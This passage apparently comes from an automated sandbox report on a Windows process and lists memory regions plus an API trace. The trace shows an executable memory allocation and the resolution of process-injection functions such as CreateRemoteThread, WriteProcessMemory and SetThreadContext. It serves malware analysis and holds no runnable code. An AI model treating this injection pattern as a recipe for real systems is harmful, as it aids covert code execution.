0x75590000 end_va = 0x7560afff monitored = 0 entry_point = 0x75591aee region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 478 start_va = 0x771d0000 end_va = 0x77226fff monitored = 0 entry_point = 0x771e9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 479 start_va = 0x75150000 end_va = 0x752edfff monitored = 0 entry_point = 0x7517e6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 480 start_va = 0x75cb0000 end_va = 0x768f9fff monitored = 0 entry_point = 0x75d31601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 481 start_va = 0x72c30000 end_va = 0x72c80fff monitored = 0 entry_point = 0x72c5988c region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\SysWOW64\\winspool.drv" (normalized: "c:\\windows\\syswow64\\winspool.drv") Region: id = 482 start_va = 0x76e80000 end_va = 0x76fdbfff monitored = 0 entry_point = 0x76ecba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 483 start_va = 0x757f0000 end_va = 0x7587efff monitored = 0 entry_point = 0x757f3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 484 start_va = 0x750b0000 end_va = 0x750b8fff monitored = 0 entry_point = 0x750b1220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 485 start_va = 0x660000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 486 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 487 start_va = 0x660000 end_va = 0x7e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 488 start_va = 0x820000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 489 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 490 start_va = 0x76b90000 end_va = 0x76beffff monitored = 0 entry_point = 0x76ba158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 491 start_va = 0x774b0000 end_va = 0x7757bfff monitored = 0 entry_point = 0x774b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 492 start_va = 0x830000 end_va = 0x9b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 493 start_va = 0x9c0000 end_va = 0x1dbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009c0000" filename = "" Region: id = 494 start_va = 0x20000 end_va = 0x22fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "notepad.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\notepad.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\notepad.exe.mui") Region: id = 495 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 496 start_va = 0x120000 end_va = 0x120fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 497 start_va = 0x130000 end_va = 0x130fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 498 start_va = 0x140000 end_va = 0x141fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 499 start_va = 0x1dc0000 end_va = 0x1e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001dc0000" filename = "" Region: id = 500 start_va = 0x1b0000 end_va = 0x1ecfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 501 start_va = 0x76d80000 end_va = 0x76e74fff monitored = 0 entry_point = 0x76d81865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 502 start_va = 0x75a80000 end_va = 0x75bb5fff monitored = 0 entry_point = 0x75a81b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 503 start_va = 0x75650000 end_va = 0x75770fff monitored = 0 entry_point = 0x7565158e region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 504 start_va = 0x76d70000 end_va = 0x76d7bfff monitored = 0 entry_point = 0x76d7238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 505 start_va = 0x75880000 end_va = 0x75a7afff monitored = 0 entry_point = 0x758822d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 506 start_va = 0x75610000 end_va = 0x75644fff monitored = 0 entry_point = 0x7561145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 507 start_va = 0x76c10000 end_va = 0x76c15fff monitored = 0 entry_point = 0x76c11782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 508 start_va = 0x1e70000 end_va = 0x207ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 509 start_va = 0x1e70000 end_va = 0x1f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 510 start_va = 0x2040000 end_va = 0x207ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 511 start_va = 0x2080000 end_va = 0x2180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 512 start_va = 0x2190000 end_va = 0x2290fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002190000" filename = "" Region: id = 513 start_va = 0x742a0000 end_va = 0x742b6fff monitored = 0 entry_point = 0x742a3573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 514 start_va = 0x250000 end_va = 0x28bfff monitored = 0 entry_point = 0x25128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 515 start_va = 0x250000 end_va = 0x28bfff monitored = 0 entry_point = 0x25128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 516 start_va = 0x250000 end_va = 0x28bfff monitored = 0 entry_point = 0x25128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 517 start_va = 0x250000 end_va = 0x28bfff monitored = 0 entry_point = 0x25128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 518 start_va = 0x250000 end_va = 0x28bfff monitored = 0 entry_point = 0x25128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 519 start_va = 0x74260000 end_va = 0x7429afff monitored = 0 entry_point = 0x7426128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 520 start_va = 0x22a0000 end_va = 0x256efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 521 start_va = 0x74ea0000 end_va = 0x74eaffff monitored = 0 entry_point = 0x74ea38c1 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\SysWOW64\\nlaapi.dll" (normalized: "c:\\windows\\syswow64\\nlaapi.dll") Region: id = 522 start_va = 0x150000 end_va = 0x16ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 523 start_va = 0x2570000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002570000" filename = "" Region: id = 524 start_va = 0x74e40000 end_va = 0x74e4ffff monitored = 0 entry_point = 0x74e41526 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\SysWOW64\\NapiNSP.dll" (normalized: "c:\\windows\\syswow64\\napinsp.dll") Region: id = 525 start_va = 0x1de0000 end_va = 0x1e1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001de0000" filename = "" Region: id = 526 start_va = 0x1e20000 end_va = 0x1e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e20000" filename = "" Region: id = 527 start_va = 0x1e60000 end_va = 0x1e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 528 start_va = 0x74e20000 end_va = 0x74e31fff monitored = 0 entry_point = 0x74e218f2 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\SysWOW64\\pnrpnsp.dll" (normalized: "c:\\windows\\syswow64\\pnrpnsp.dll") Region: id = 529 start_va = 0x7efd5000 end_va = 0x7efd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 530 start_va = 0x75070000 end_va = 0x750abfff monitored = 0 entry_point = 0x7507145d region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 531 start_va = 0x750d0000 end_va = 0x75113fff monitored = 0 entry_point = 0x750e63f9 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 532 start_va = 0x250000 end_va = 0x29ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 533 start_va = 0x74e10000 end_va = 0x74e17fff monitored = 0 entry_point = 0x74e1131e region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\SysWOW64\\winrnr.dll" (normalized: "c:\\windows\\syswow64\\winrnr.dll") Region: id = 534 start_va = 0x753d0000 end_va = 0x753ebfff monitored = 0 entry_point = 0x753da431 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 535 start_va = 0x750c0000 end_va = 0x750c6fff monitored = 0 entry_point = 0x750c128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 536 start_va = 0x74f80000 end_va = 0x74fb7fff monitored = 0 entry_point = 0x74f8990e region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 537 start_va = 0x1e70000 end_va = 0x1f2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 538 start_va = 0x1f50000 end_va = 0x1f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f50000" filename = "" Region: id = 539 start_va = 0x75040000 end_va = 0x75045fff monitored = 0 entry_point = 0x750414b2 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 540 start_va = 0x2570000 end_va = 0x266ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002570000" filename = "" Region: id = 541 start_va = 0x26e0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026e0000" filename = "" Region: id = 542 start_va = 0x130000 end_va = 0x131fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 543 start_va = 0x150000 end_va = 0x150fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 544 start_va = 0x160000 end_va = 0x16ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 545 start_va = 0x753f0000 end_va = 0x753fafff monitored = 0 entry_point = 0x753f1992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 546 start_va = 0x1f0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 547 start_va = 0x200000 end_va = 0x207fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 548 start_va = 0x250000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 549 start_va = 0x260000 end_va = 0x29ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 550 start_va = 0x520000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 551 start_va = 0x560000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 552 start_va = 0x1e80000 end_va = 0x1ebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 553 start_va = 0x1ef0000 end_va = 0x1f2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ef0000" filename = "" Region: id = 554 start_va = 0x7efad000 end_va = 0x7efaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 555 start_va = 0x74ef0000 end_va = 0x74f41fff monitored = 0 entry_point = 0x74ef14be region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\SysWOW64\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll") Region: id = 556 start_va = 0x74ed0000 end_va = 0x74ee4fff monitored = 0 entry_point = 0x74ed12de region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\SysWOW64\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll") Region: id = 557 start_va = 0x74ec0000 end_va = 0x74eccfff monitored = 0 entry_point = 0x74ec1326 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\SysWOW64\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll") Region: id = 558 start_va = 0x1f90000 end_va = 0x1fcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 559 start_va = 0x2000000 end_va = 0x203ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 560 start_va = 0x7efaa000 end_va = 0x7efacfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 561 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 562 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 563 start_va = 0x74eb0000 end_va = 0x74eb5fff monitored = 0 entry_point = 0x74eb125a region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\SysWOW64\\SensApi.dll" (normalized: "c:\\windows\\syswow64\\sensapi.dll") Region: id = 564 start_va = 0x330000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 565 start_va = 0x2800000 end_va = 0x283ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 566 start_va = 0x7efa7000 end_va = 0x7efa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 567 start_va = 0x26f0000 end_va = 0x27fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026f0000" filename = "" Region: id = 568 start_va = 0x420000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 569 start_va = 0x75060000 end_va = 0x75064fff monitored = 0 entry_point = 0x750615df region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll") Region: id = 570 start_va = 0x26f0000 end_va = 0x27effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026f0000" filename = "" Region: id = 571 start_va = 0x28c0000 end_va = 0x28fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028c0000" filename = "" Region: id = 572 start_va = 0x2950000 end_va = 0x298ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002950000" filename = "" Region: id = 573 start_va = 0x7efa4000 end_va = 0x7efa6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Thread: id = 9 os_tid = 0xf4c Thread: id = 10 os_tid = 0xf50 [0083.257] VirtualAlloc (lpAddress=0x0, dwSize=0x3d000, flAllocationType=0x3000, flProtect=0x40) returned 0x1b0000 [0083.262] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0083.262] GetProcAddress (hModule=0x769b0000, lpProcName="ExpandEnvironmentStringsA") returned 0x769deb09 [0083.262] GetProcAddress (hModule=0x769b0000, lpProcName="GetFileAttributesA") returned 0x769c53cc [0083.263] GetProcAddress (hModule=0x769b0000, lpProcName="FileTimeToSystemTime") returned 0x769c53e4 [0083.263] GetProcAddress (hModule=0x769b0000, lpProcName="FindFirstFileA") returned 0x769ce286 [0083.263] GetProcAddress (hModule=0x769b0000, lpProcName="CopyFileA") returned 0x769e58b5 [0083.263] GetProcAddress (hModule=0x769b0000, lpProcName="FindClose") returned 0x769c43fa [0083.263] GetProcAddress (hModule=0x769b0000, lpProcName="MoveFileA") returned 0x76a3dd81 [0083.263] GetProcAddress (hModule=0x769b0000, lpProcName="FindNextFileA") returned 0x769ed52e [0083.263] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualProtect") returned 0x769c4317 [0083.263] GetProcAddress (hModule=0x769b0000, lpProcName="CreateRemoteThread") returned 0x76a4470b [0083.264] GetProcAddress (hModule=0x769b0000, lpProcName="OpenProcess") returned 0x769c1966 [0083.264] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualAllocEx") returned 0x769dd980 [0083.264] GetProcAddress (hModule=0x769b0000, lpProcName="LoadLibraryA") returned 0x769c498f [0083.264] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentProcessId") returned 0x769c11f8 [0083.264] GetProcAddress (hModule=0x769b0000, lpProcName="Thread32First") returned 0x76a46133 [0083.264] GetProcAddress (hModule=0x769b0000, lpProcName="Thread32Next") returned 0x76a461df [0083.264] GetProcAddress (hModule=0x769b0000, lpProcName="OpenThread") returned 0x769d1200 [0083.264] GetProcAddress (hModule=0x769b0000, lpProcName="CreateToolhelp32Snapshot") returned 0x769e7327 [0083.264] GetProcAddress (hModule=0x769b0000, lpProcName="CreateThread") returned 0x769c3485 [0083.264] GetProcAddress (hModule=0x769b0000, lpProcName="SetThreadContext") returned 0x76a45933 [0083.264] GetProcAddress (hModule=0x769b0000, lpProcName="MapViewOfFile") returned 0x769c18d1 [0083.264] GetProcAddress (hModule=0x769b0000, lpProcName="UnmapViewOfFile") returned 0x769c1806 [0083.265] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualAlloc") returned 0x769c1836 [0083.265] GetProcAddress (hModule=0x769b0000, lpProcName="CreateFileMappingA") returned 0x769c54be [0083.265] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualFree") returned 0x769c184e [0083.265] GetProcAddress (hModule=0x769b0000, lpProcName="SetLastError") returned 0x769c11a9 [0083.265] GetProcAddress (hModule=0x769b0000, lpProcName="GetVersionExA") returned 0x769c34c9 [0083.265] GetProcAddress (hModule=0x769b0000, lpProcName="PeekNamedPipe") returned 0x76a44dc1 [0083.265] GetProcAddress (hModule=0x769b0000, lpProcName="WaitNamedPipeA") returned 0x76a42066 [0083.265] GetProcAddress (hModule=0x769b0000, lpProcName="SetNamedPipeHandleState") returned 0x76a44adf [0083.265] GetProcAddress (hModule=0x769b0000, lpProcName="GetComputerNameA") returned 0x769db6b8 [0083.265] GetProcAddress (hModule=0x769b0000, lpProcName="GetACP") returned 0x769c177c [0083.265] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleFileNameA") returned 0x769c1491 [0083.265] GetProcAddress (hModule=0x769b0000, lpProcName="GetOEMCP") returned 0x769ed191 [0083.266] GetProcAddress (hModule=0x769b0000, lpProcName="DeleteProcThreadAttributeList") returned 0x76fe76c5 [0083.266] GetProcAddress (hModule=0x769b0000, lpProcName="HeapAlloc") returned 0x77a0e026 [0083.266] GetProcAddress (hModule=0x769b0000, lpProcName="HeapFree") returned 0x769c14a9 [0083.266] GetProcAddress (hModule=0x769b0000, lpProcName="GetProcessHeap") returned 0x769c14c9 [0083.266] GetProcAddress (hModule=0x769b0000, lpProcName="InitializeProcThreadAttributeList") returned 0x76fef83c [0083.266] GetProcAddress (hModule=0x769b0000, lpProcName="SetErrorMode") returned 0x769c1ae0 [0083.266] GetProcAddress (hModule=0x769b0000, lpProcName="GetLogicalDrives") returned 0x769c5329 [0083.266] GetProcAddress (hModule=0x769b0000, lpProcName="ProcessIdToSessionId") returned 0x769c1275 [0083.266] GetProcAddress (hModule=0x769b0000, lpProcName="DuplicateHandle") returned 0x769c1866 [0083.266] GetProcAddress (hModule=0x769b0000, lpProcName="Process32First") returned 0x769e8abb [0083.266] GetProcAddress (hModule=0x769b0000, lpProcName="Process32Next") returned 0x769e8812 [0083.267] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualQuery") returned 0x769c4412 [0083.267] GetProcAddress (hModule=0x769b0000, lpProcName="ExitProcess") returned 0x769c79c8 [0083.267] GetProcAddress (hModule=0x769b0000, lpProcName="ExitThread") returned 0x77a3d598 [0083.267] GetProcAddress (hModule=0x769b0000, lpProcName="SystemTimeToTzSpecificLocalTime") returned 0x769e0622 [0083.267] GetProcAddress (hModule=0x769b0000, lpProcName="GetFullPathNameA") returned 0x769ce279 [0083.267] GetProcAddress (hModule=0x769b0000, lpProcName="ResumeThread") returned 0x769c43a7 [0083.267] GetProcAddress (hModule=0x769b0000, lpProcName="WriteProcessMemory") returned 0x769dd9b0 [0083.267] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualProtectEx") returned 0x76a44b5f [0083.267] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentDirectoryW") returned 0x769c55c9 [0083.267] GetProcAddress (hModule=0x769b0000, lpProcName="TerminateProcess") returned 0x769dd7d2 [0083.267] GetProcAddress (hModule=0x769b0000, lpProcName="CreateProcessA") returned 0x769c1072 [0083.267] GetProcAddress (hModule=0x769b0000, lpProcName="ReadProcessMemory") returned 0x769dcfa4 [0083.268] GetProcAddress (hModule=0x769b0000, lpProcName="GetThreadContext") returned 0x769e799c [0083.268] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleHandleA") returned 0x769c1245 [0083.268] GetProcAddress (hModule=0x769b0000, lpProcName="CreateNamedPipeA") returned 0x76a41c37 [0083.268] GetProcAddress (hModule=0x769b0000, lpProcName="GetProcAddress") returned 0x769c1222 [0083.268] GetProcAddress (hModule=0x769b0000, lpProcName="ReadFile") returned 0x769c3e83 [0083.268] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentThread") returned 0x769c17cc [0083.268] GetProcAddress (hModule=0x769b0000, lpProcName="ConnectNamedPipe") returned 0x76a4469b [0083.268] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentProcess") returned 0x769c17e9 [0083.268] GetProcAddress (hModule=0x769b0000, lpProcName="CloseHandle") returned 0x769c13f0 [0083.268] GetProcAddress (hModule=0x769b0000, lpProcName="GetFileTime") returned 0x769c43bf [0083.268] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentDirectoryA") returned 0x769ed4e6 [0083.268] GetProcAddress (hModule=0x769b0000, lpProcName="CreatePipe") returned 0x76a446fb [0083.269] GetProcAddress (hModule=0x769b0000, lpProcName="GetLocalTime") returned 0x769c5a5e [0083.269] GetProcAddress (hModule=0x769b0000, lpProcName="GetLastError") returned 0x769c11c0 [0083.269] GetProcAddress (hModule=0x769b0000, lpProcName="GetStartupInfoA") returned 0x769c0e00 [0083.269] GetProcAddress (hModule=0x769b0000, lpProcName="SetCurrentDirectoryA") returned 0x769d17ec [0083.269] GetProcAddress (hModule=0x769b0000, lpProcName="FlushFileBuffers") returned 0x769c4653 [0083.269] GetProcAddress (hModule=0x769b0000, lpProcName="DisconnectNamedPipe") returned 0x76a4477f [0083.269] GetProcAddress (hModule=0x769b0000, lpProcName="MultiByteToWideChar") returned 0x769c190e [0083.269] GetProcAddress (hModule=0x769b0000, lpProcName="WriteFile") returned 0x769c1282 [0083.269] GetProcAddress (hModule=0x769b0000, lpProcName="DebugBreak") returned 0x76a44755 [0083.269] GetProcAddress (hModule=0x769b0000, lpProcName="RaiseException") returned 0x769c585e [0083.269] GetProcAddress (hModule=0x769b0000, lpProcName="SetEnvironmentVariableW") returned 0x769c89a9 [0083.269] GetProcAddress (hModule=0x769b0000, lpProcName="SetFileTime") returned 0x769dec8b [0083.270] GetProcAddress (hModule=0x769b0000, lpProcName="GetTickCount") returned 0x769c110c [0083.270] GetProcAddress (hModule=0x769b0000, lpProcName="WaitForSingleObject") returned 0x769c1136 [0083.270] GetProcAddress (hModule=0x769b0000, lpProcName="SetEnvironmentVariableA") returned 0x769ce2e9 [0083.270] GetProcAddress (hModule=0x769b0000, lpProcName="CompareStringW") returned 0x769c3b7a [0083.270] GetProcAddress (hModule=0x769b0000, lpProcName="CompareStringA") returned 0x769c3c0a [0083.270] GetProcAddress (hModule=0x769b0000, lpProcName="SetEndOfFile") returned 0x769dce06 [0083.270] GetProcAddress (hModule=0x769b0000, lpProcName="GetStringTypeW") returned 0x769c1926 [0083.270] GetProcAddress (hModule=0x769b0000, lpProcName="GetStringTypeA") returned 0x769e822e [0083.270] GetProcAddress (hModule=0x769b0000, lpProcName="LCMapStringW") returned 0x769c1799 [0083.270] GetProcAddress (hModule=0x769b0000, lpProcName="LCMapStringA") returned 0x769ebc21 [0083.270] GetProcAddress (hModule=0x769b0000, lpProcName="SetStdHandle") returned 0x76a44aef [0083.271] GetProcAddress (hModule=0x769b0000, lpProcName="WriteConsoleW") returned 0x769e7a92 [0083.271] GetProcAddress (hModule=0x769b0000, lpProcName="GetConsoleOutputCP") returned 0x769d9ae7 [0083.271] GetProcAddress (hModule=0x769b0000, lpProcName="WriteConsoleA") returned 0x769c12fc [0083.271] GetProcAddress (hModule=0x769b0000, lpProcName="GetLocaleInfoA") returned 0x769dd5b5 [0083.271] GetProcAddress (hModule=0x769b0000, lpProcName="HeapSize") returned 0x77a13002 